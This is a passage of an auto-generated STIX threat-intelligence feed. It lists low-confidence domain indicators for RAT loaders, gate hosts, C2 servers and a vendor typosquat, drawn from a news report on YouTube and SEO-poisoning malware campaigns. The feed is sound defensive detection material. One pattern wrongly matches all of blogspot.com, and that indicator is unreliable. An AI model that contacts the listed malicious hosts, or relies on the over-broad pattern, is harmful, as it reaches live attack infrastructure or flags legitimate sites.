Hijacker\" (Cyber Security News). Context: ferLoader installation-tracker infrastructure Domain velfps.blogspot[.]com ; velvoxlab.blogspot[.]com ; venrx.blogspot[.]com ; venrx","pattern":"[domain-name:value = 'blogspot.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f587ee4a-a0af-4d59-9b20-32650257b9ad","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: boardmagic.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]online OfferLoader in","pattern":"[domain-name:value = 'boardmagic.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--d46828de-436d-41c0-b785-32fe241afeac","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: boatthought.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ayground[.]xyz ; bikesdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[","pattern":"[domain-name:value = 'boatthought.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--4f68c873-f6a6-4a0e-984a-78658c9a8e23","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: boundarychickens.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: esdonkey[.]info ; birthdaymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xy","pattern":"[domain-name:value = 'boundarychickens.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--b9c38669-3fa6-4ea4-b18c-f2c1ea7d8064","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: boundaryfly.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.beefteeth[.]xyz ; connect.believesisters[.]xyz ; connect.boundaryfly[.]xyz ; connect.bubbleappliance[.]xyz ; connect.cableland[.]xyz","pattern":"[domain-name:value = 'boundaryfly.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--2fc0d215-dcfc-442f-be59-13d7cdad57bd","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: boytank.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ymagic[.]xyz ; boatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.","pattern":"[domain-name:value = 'boytank.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8806fd7d-9ec8-45d4-b927-9439760c0129","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: branchmorning.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: oatthought[.]xyz ; boundarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[","pattern":"[domain-name:value = 'branchmorning.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0a89f1b3-8cc6-4ded-a96a-d8aaa997a75a","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: breathdoctor.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ndarychickens[.]xyz ; boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.","pattern":"[domain-name:value = 'breathdoctor.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--bcaff8c5-f64b-463d-8785-f85a5d477f65","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bubbleappliance.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: .believesisters[.]xyz ; connect.boundaryfly[.]xyz ; connect.bubbleappliance[.]xyz ; connect.cableland[.]xyz ; connect.chinexpert[.]xyz ; co","pattern":"[domain-name:value = 'bubbleappliance.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f37225d3-e510-40a8-a15c-1def2aedabe6","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: bubbleslip.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: boytank[.]xyz ; branchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]","pattern":"[domain-name:value = 'bubbleslip.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9000b9bf-66cf-4817-97a8-403729e71151","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: cabbagemeasure.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: anchmorning[.]xyz ; breathdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz","pattern":"[domain-name:value = 'cabbagemeasure.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--0d0ac4bc-1684-4aef-8136-f4d8fdcbcce4","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: cablecanvas.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: athdoctor[.]xyz ; bubbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz","pattern":"[domain-name:value = 'cablecanvas.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--8f1f2aa0-a207-447d-9b10-1e979acf0ff0","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: cableland.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: boundaryfly[.]xyz ; connect.bubbleappliance[.]xyz ; connect.cableland[.]xyz ; connect.chinexpert[.]xyz ; connect.conditiongrade[.]xyz","pattern":"[domain-name:value = 'cableland.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--fb8d786e-00bf-4537-a102-715544a81bca","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: cardgrape.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: bbleslip[.]xyz ; cabbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; centscarf[.]xyz","pattern":"[domain-name:value = 'cardgrape.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ec14ce10-6ab6-4513-a488-58817a590950","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: cattlegold.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: abbagemeasure[.]xyz ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; centscarf[.]xyz CL-CRI-1171 gate an","pattern":"[domain-name:value = 'cattlegold.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f80f3a07-23be-4b9a-8ccf-6436372fa371","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: celeryerror.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; cablecanvas[.]xyz ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; centscarf[.]xyz CL-CRI-1171 gate and landing infrastruc","pattern":"[domain-name:value = 'celeryerror.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--36384878-8479-4b74-ba24-305b575918c8","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: centscarf.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; cardgrape[.]xyz ; cattlegold[.]xyz ; celeryerror[.]xyz ; centscarf[.]xyz CL-CRI-1171 gate and landing infrastructure Domain chalkp","pattern":"[domain-name:value = 'centscarf.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--972ea9aa-7add-4c34-96aa-795a3ab269a4","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: chalkprose.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: rf[.]xyz CL-CRI-1171 gate and landing infrastructure Domain chalkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[","pattern":"[domain-name:value = 'chalkprose.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--54848e8d-afec-4fc7-867e-fd8eeaa934bc","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: chawton.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: tructure Domain voyagemist[.]space ; statementtouch[.]xyz ; chawton[.]info OfferLoader payload handoff and second-stage hosts Domain","pattern":"[domain-name:value = 'chawton.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--5d79422f-ceda-4a32-802b-58fd6842efb1","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: cherriestruck.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 1 gate and landing infrastructure Domain chalkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]x","pattern":"[domain-name:value = 'cherriestruck.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--77fba749-dc02-4fc9-b98e-ca6e1e4bc533","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: chesstail.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: structure Domain chalkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]x","pattern":"[domain-name:value = 'chesstail.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f71f44fe-84fc-46d4-b111-2a321b28c9f8","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: chickensmine.space","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: halkprose[.]xyz ; cherriestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz","pattern":"[domain-name:value = 'chickensmine.space']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--1e8122b7-e8d7-450a-a6d1-1100f812babb","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: chinexpert.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: t.bubbleappliance[.]xyz ; connect.cableland[.]xyz ; connect.chinexpert[.]xyz ; connect.conditiongrade[.]xyz ; connect.coppersummer[.]x","pattern":"[domain-name:value = 'chinexpert.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--f66cb2d2-276b-42a7-9e9d-512c121ee918","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: churchpail.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: iestruck[.]space ; chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz","pattern":"[domain-name:value = 'churchpail.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--400bf505-35d3-4bdb-8365-973fe68e69d9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: clothcrib.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: chesstail[.]xyz ; chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz CL-CRI-1171 gate a","pattern":"[domain-name:value = 'clothcrib.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--9c78c72d-c8d4-451a-875f-3fa8a12a25e9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: clothcurrent.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: chickensmine[.]space ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz CL-CRI-1171 gate and landing infrastruc","pattern":"[domain-name:value = 'clothcurrent.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c5e4f1f6-eed8-4d5b-a9f0-950fdddd0128","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: coatberry.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ; churchpail[.]xyz ; clothcrib[.]xyz ; clothcurrent[.]xyz ; coatberry[.]xyz CL-CRI-1171 gate and landing infrastructure Domain connec","pattern":"[domain-name:value = 'coatberry.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e1ad9a34-dd9c-487c-8b14-f4deefca0abd","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: collartitle.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ect.fuelleg[.]info ; vesselsystem[.]xyz ; minewave[.]info ; collartitle[.]info ; boardmagic[.]info ; placespoon[.]xyz ; needcherries[.]o","pattern":"[domain-name:value = 'collartitle.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--e54f880e-2234-4bf6-84f3-c01dfe8ae71b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: conditiongrade.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: onnect.cableland[.]xyz ; connect.chinexpert[.]xyz ; connect.conditiongrade[.]xyz ; connect.coppersummer[.]xyz ; connect.creatorcreator[.]x","pattern":"[domain-name:value = 'conditiongrade.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--168e63de-d958-4113-9d4d-867ff31ad50b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: coppersummer.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: t.chinexpert[.]xyz ; connect.conditiongrade[.]xyz ; connect.coppersummer[.]xyz ; connect.creatorcreator[.]xyz ; connect.dresstent[.]xyz","pattern":"[domain-name:value = 'coppersummer.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--812ae86f-5604-46a9-9724-72ab712f0c6e","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: creatorcreator.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: conditiongrade[.]xyz ; connect.coppersummer[.]xyz ; connect.creatorcreator[.]xyz ; connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; con","pattern":"[domain-name:value = 'creatorcreator.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--ffff661b-03b1-41ca-9879-a8b1be555f0b","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: crowdstri.com","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: cript host Domain stryper[.]info ; aa.amazingshield[.]xyz ; crowdstri[.]com Insomnia RAT stage hosts and Python-agent C2 typosquat Do","pattern":"[domain-name:value = 'crowdstri.com']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--c2889d2d-8ec3-4a7e-9954-cddc5c1367e9","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: drelto.info","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: 6546.py Stage-three Python Insomnia RAT agent URL hxxps[:]//drelto[.]info/farlix Search-result injection script host Domain stryper","pattern":"[domain-name:value = 'drelto.info']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--00728fdd-825c-499f-86fd-5d3f9a9c0552","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: dresstent.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: coppersummer[.]xyz ; connect.creatorcreator[.]xyz ; connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; connect.edgeplayground[.]xyz","pattern":"[domain-name:value = 'dresstent.xyz']","pattern_type":"stix","valid_from":"2026-09-14T08:01:44.000Z","labels":["auto-extracted","malware"],"confidence":30,"external_references":[{"source_name":"Cyber Security News","url":"https://cybersecuritynews.com/hackers-abuse-youtube-gaming/"}]},{"type":"indicator","spec_version":"2.1","id":"indicator--13e7e382-24d3-4b98-b05a-a310917a56d8","created":"2026-09-14T08:01:44.000Z","modified":"2026-09-16T11:18:31.777Z","created_by_ref":"identity--d7a03d8f-6141-43be-b45a-d24fc29fbce8","name":"domain: dropjeans.xyz","description":"Seen in \"Hackers Abuse YouTube Gaming Channels and SEO Poisoning to Deploy RATs and Chrome Hijacker\" (Cyber Security News). Context: ct.creatorcreator[.]xyz ; connect.dresstent[.]xyz ; connect.dropjeans[.]xyz ; connect.edgeplayground[.]xyz ; connect.exchangeclub[.]x","pattern":"[domain-name:value = 